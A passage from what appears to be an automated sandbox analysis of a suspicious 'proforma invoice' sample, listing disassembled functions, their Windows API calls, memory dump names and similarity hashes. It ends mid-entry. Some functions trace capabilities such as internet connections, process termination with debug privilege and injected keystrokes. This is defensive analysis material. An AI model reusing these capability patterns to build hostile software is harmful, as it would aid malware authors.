                  Function 00B350D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00B35186
                  • ShowWindow.USER32(?,00000000), ref: 00B351C7
                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 00B351CD
                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00B351D1
                    • Part of subcall function 00B36FBA: DeleteObject.GDI32(00000000), ref: 00B36FE6
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B3520D
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B3521A
                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B3524D
                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00B35287
                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00B35296
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                  • String ID:
                  • API String ID: 3210457359-0
                  • Opcode ID: 82e45f5fa9b0ab3dfa1b46ccac1920ab60881cb385ca06e5a791eabea8354187
                  • Instruction ID: 6e5ac436cb02a918af14e575bf32befc3617d43b9a1bb6892b59ae2b15caf09e
                  • Opcode Fuzzy Hash: 82e45f5fa9b0ab3dfa1b46ccac1920ab60881cb385ca06e5a791eabea8354187
                  • Instruction Fuzzy Hash: C7519130A50A08BFEF309F64CC46BDA3BE5EB05321F348591FA15A72E1CB75A990DB40
                  Function 00AB8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00AF6890
                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00AF68A9
                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00AF68B9
                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00AF68D1
                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AF68F2
                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00AF6901
                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AF691E
                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00AF692D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                  • String ID:
                  • API String ID: 1268354404-0
                  • Opcode ID: 4a66c713a497472d50b3ffee85125d02b5f7b26bad2e81fef7e714f684aa9a38
                  • Instruction ID: a9cfc17c914954bad923e38aad6c388bceaf9df52a48cc5f8c0ac9eea5d5df33
                  • Opcode Fuzzy Hash: 4a66c713a497472d50b3ffee85125d02b5f7b26bad2e81fef7e714f684aa9a38
                  • Instruction Fuzzy Hash: 29518870600209EFDB20CF68CC95FAE7BB9EF58750F204518FA16A72A0DB74E991DB50
                  Function 00B1C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1C182
                  • GetLastError.KERNEL32 ref: 00B1C195
                  • SetEvent.KERNEL32(?), ref: 00B1C1A9
                    • Part of subcall function 00B1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1C272
                    • Part of subcall function 00B1C253: GetLastError.KERNEL32 ref: 00B1C322
                    • Part of subcall function 00B1C253: SetEvent.KERNEL32(?), ref: 00B1C336
                    • Part of subcall function 00B1C253: InternetCloseHandle.WININET(00000000), ref: 00B1C341
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                  • String ID:
                  • API String ID: 337547030-0
                  • Opcode ID: 70c1be7499fd3bc2c03525a0c1b3d0039f8aca70c1d3810cde15a29543dbd104
                  • Instruction ID: 6f1c422700dedc276d741c4945e671b3bb179b2b3703f69317886cc090fb1eb1
                  • Opcode Fuzzy Hash: 70c1be7499fd3bc2c03525a0c1b3d0039f8aca70c1d3810cde15a29543dbd104
                  • Instruction Fuzzy Hash: 0F317A71280601EFDB219FE5DC48AAABFF9FF18300B50445DF95A93610DB30E9949BA0
                  Function 00B025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                    • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                    • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B025BD
                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B025DB
                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B025DF
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B025E9
                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B02601
                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B02605
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B0260F
                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B02623
                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B02627
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                  • String ID:
                  • API String ID: 2014098862-0
                  • Opcode ID: 7ece0f3a2372bf6352220c7aa7a772ad4b25404f36e34a3b9fea6dbe0a9fba20
                  • Instruction ID: ae09bbbb6b563360615e7eb33daebdffbf2da34ae1decd7393d6a5731c4c8311
                  • Opcode Fuzzy Hash: 7ece0f3a2372bf6352220c7aa7a772ad4b25404f36e34a3b9fea6dbe0a9fba20
                  • Instruction Fuzzy Hash: EA01D431390610BBFB1067A89C8EF5D3F99EB4EB12F200001F318BF0E1CDE224449A69
                  Function 00B01803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B01449,?,?,00000000), ref: 00B0180C
                  • HeapAlloc.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B01813
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B01449,?,?,00000000), ref: 00B01828
                  • GetCurrentProcess.KERNEL32(?,00000000,?,00B01449,?,?,00000000), ref: 00B01830
                  • DuplicateHandle.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B01833
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B01449,?,?,00000000), ref: 00B01843
                  • GetCurrentProcess.KERNEL32(00B01449,00000000,?,00B01449,?,?,00000000), ref: 00B0184B
                  • DuplicateHandle.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B0184E
                  • CreateThread.KERNEL32(00000000,00000000,00B01874,00000000,00000000,00000000), ref: 00B01868
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                  • String ID:
                  • API String ID: 1957940570-0
                  • Opcode ID: 48a64d5271aa6f866dd6648d23662723e9177888ae2a7e29ffaec21b9cf84c9e
                  • Instruction ID: 90d638d9c879a5c06dc8c3eae28ca26b1a5ee483e77677ad4cd6c2133ba22c4d
                  • Opcode Fuzzy Hash: 48a64d5271aa6f866dd6648d23662723e9177888ae2a7e29ffaec21b9cf84c9e
                  • Instruction Fuzzy Hash: 1F01BBB5240708BFE710ABA5DC4DF6B3FACEB89B11F108411FA05EB1A1CA70D810DB20
                  Function 00B2A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B0D501
                    • Part of subcall function 00B0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B0D50F
                    • Part of subcall function 00B0D4DC: CloseHandle.KERNEL32(00000000), ref: 00B0D5DC
                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2A16D
                  • GetLastError.KERNEL32 ref: 00B2A180
                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2A1B3
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B2A268
                  • GetLastError.KERNEL32(00000000), ref: 00B2A273
                  • CloseHandle.KERNEL32(00000000), ref: 00B2A2C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                  • String ID: SeDebugPrivilege
                  • API String ID: 2533919879-2896544425
                  • Opcode ID: ac54e404d5877f7f1eed021afd2bf6744b76efcfa6cd9f0dd387e6b4e3cd1fcc
                  • Instruction ID: b64a7699e49730fc8e414259d97ddcee332ee2b2334f93679d8068c5e9db7ba7
                  • Opcode Fuzzy Hash: ac54e404d5877f7f1eed021afd2bf6744b76efcfa6cd9f0dd387e6b4e3cd1fcc
                  • Instruction Fuzzy Hash: 01618E302042529FD720DF18D494F1ABBE5EF45318F18849CE46A9B7A3C776EC49CB92
                  Function 00B33886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B33925
                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B3393A
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B33954
                  • _wcslen.LIBCMT ref: 00B33999
                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B339C6
                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B339F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$Window_wcslen
                  • String ID: SysListView32
                  • API String ID: 2147712094-78025650
                  • Opcode ID: 6836185ec7c77413264cba90a2e8f7a896e93542eb412db1979770f7d0b4a295
                  • Instruction ID: bd2f9f7b345421ccd6f4d283410bfe7642f2413a5586a66d1e6016e3b55fdf54
                  • Opcode Fuzzy Hash: 6836185ec7c77413264cba90a2e8f7a896e93542eb412db1979770f7d0b4a295
                  • Instruction Fuzzy Hash: C741A471A00218ABEB219F64CC45FEF7BE9EF08754F200566F559E7291D7719D80CB90
                  Function 00B0BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B0BCFD
                  • IsMenu.USER32(00000000), ref: 00B0BD1D
                  • CreatePopupMenu.USER32 ref: 00B0BD53
                  • GetMenuItemCount.USER32(014F6228), ref: 00B0BDA4
                  • InsertMenuItemW.USER32(014F6228,?,00000001,00000030), ref: 00B0BDCC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                  • String ID: 0$2
                  • API String ID: 93392585-3793063076
                  • Opcode ID: 1123c3b771c50165c0605b4afd61c00c34d6726eb868c9cee030da66a4ef763d
                  • Instruction ID: 0225c6be0efb4ea36df9a9bbb03fcab3c49cc55676dad1d34288709793128b96
                  • Opcode Fuzzy Hash: 1123c3b771c50165c0605b4afd61c00c34d6726eb868c9cee030da66a4ef763d
                  • Instruction Fuzzy Hash: 5F518C70A00206EBDB20DFA8D889FAEFFF4EF55354F2482A9E411A72D1D7709945CB61
                  Function 00B0C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadIconW.USER32(00000000,00007F03), ref: 00B0C913
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconLoad
                  • String ID: blank$info$question$stop$warning
                  • API String ID: 2457776203-404129466
                  • Opcode ID: c6ededa03912db855b972d332d83fc185372695c763e1f07eae9bfbc5d6cc6f4
                  • Instruction ID: 88d5aac780fb02eab6c6202d7953c675cab27e1376fcdb2b154d2040858be893
                  • Opcode Fuzzy Hash: c6ededa03912db855b972d332d83fc185372695c763e1f07eae9bfbc5d6cc6f4
                  • Instruction Fuzzy Hash: 9E110A32689306BAE7169B549CC3DBE7FDCDF15354B2041AEF904A62D2E7B49E00526C
                  Function 00B0ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$LocalTime
                  • String ID:
                  • API String ID: 952045576-0
                  • Opcode ID: 56ec14bab143e79aadbec94110c8fd5cce686eed047ebd7595d166b5170922d3
                  • Instruction ID: 3247f654447d2c3f8684a3e6cd09d4effc12cdff20ebc49f54fcf7a485a81278
                  • Opcode Fuzzy Hash: 56ec14bab143e79aadbec94110c8fd5cce686eed047ebd7595d166b5170922d3
                  • Instruction Fuzzy Hash: F341C165C1021875DB51EBF4C98AECFB7ACEF05300F11896AE528E3161FB34E245C3A9
                  Function 00ABF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                  Download Yara Rule
                  APIs
                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00ABF953
                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00AFF3D1
                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00AFF454
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ShowWindow
                  • String ID:
                  • API String ID: 1268545403-0
                  • Opcode ID: 51135e7e8abdd0b1b5714c7301af333b78766e71d8bc6b12d8bc2ae30eff240f
                  • Instruction ID: f48f3979648ac037c29d6497a94b66169232784a8ffbed9118fe78df9e0df074
                  • Opcode Fuzzy Hash: 51135e7e8abdd0b1b5714c7301af333b78766e71d8bc6b12d8bc2ae30eff240f
                  • Instruction Fuzzy Hash: BC411A31608680FEC7398B6D8C887BA7FA9AF56314F2C453CF59767562CA31A880D711
                  Function 00B32D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteObject.GDI32(00000000), ref: 00B32D1B
                  • GetDC.USER32(00000000), ref: 00B32D23
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B32D2E
                  • ReleaseDC.USER32(00000000,00000000), ref: 00B32D3A
                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B32D76
                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B32D87
                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B35A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00B32DC2
                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B32DE1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                  • String ID:
                  • API String ID: 3864802216-0
                  • Opcode ID: 3ed0af1975dce459d02d1290a50b2359ad1873ea282ef5f7b63cb98c7ef68467
                  • Instruction ID: 40a4e64328ed3dd48f64b960fd8415447c4070a453b7caac736e89fa700a0223
                  • Opcode Fuzzy Hash: 3ed0af1975dce459d02d1290a50b2359ad1873ea282ef5f7b63cb98c7ef68467
                  • Instruction Fuzzy Hash: 85316D72201614BBEB114F54CC8AFEB3FA9EB09715F144065FE08AB291CA759C50C7A4
                  Function 00B05622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: e16690067118611a3f2b666a306aaab13178921508b502d34b99ff00fdd5234c
                  • Instruction ID: 93830b4aad345ef1e9b9ec060a0ccc2911427af0bd11f485a90adae81c5360ef
                  • Opcode Fuzzy Hash: e16690067118611a3f2b666a306aaab13178921508b502d34b99ff00fdd5234c
                  • Instruction Fuzzy Hash: C8219861B40A097BD62459118F82FBB37DCEE22384F5400A4FD055AAC2F722ED1089A5
                  Function 00B24FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: NULL Pointer assignment$Not an Object type
                  • API String ID: 0-572801152
                  • Opcode ID: 2e06c0f87de9fbdb25098c6b2eaabe243e04a0d5a6e04a50b304eedc0c88e509
                  • Instruction ID: 1cbb337eb9e91e4b9e87b80fa500b8761dccb30280b6b426f6cf339ecbec70d5
                  • Opcode Fuzzy Hash: 2e06c0f87de9fbdb25098c6b2eaabe243e04a0d5a6e04a50b304eedc0c88e509
                  • Instruction Fuzzy Hash: 9FD1B371A0061A9FDF20CF98D881BAEB7F5FF48354F1484A9E919AB291E770DD41CB90
                  Function 00AE1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                  Download Yara Rule
                  APIs
                  • GetCPInfo.KERNEL32(?,?), ref: 00AE15CE
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AE1651
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AE16E4
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AE16FB
                    • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AE1777
                  • __freea.LIBCMT ref: 00AE17A2
                  • __freea.LIBCMT ref: 00AE17AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
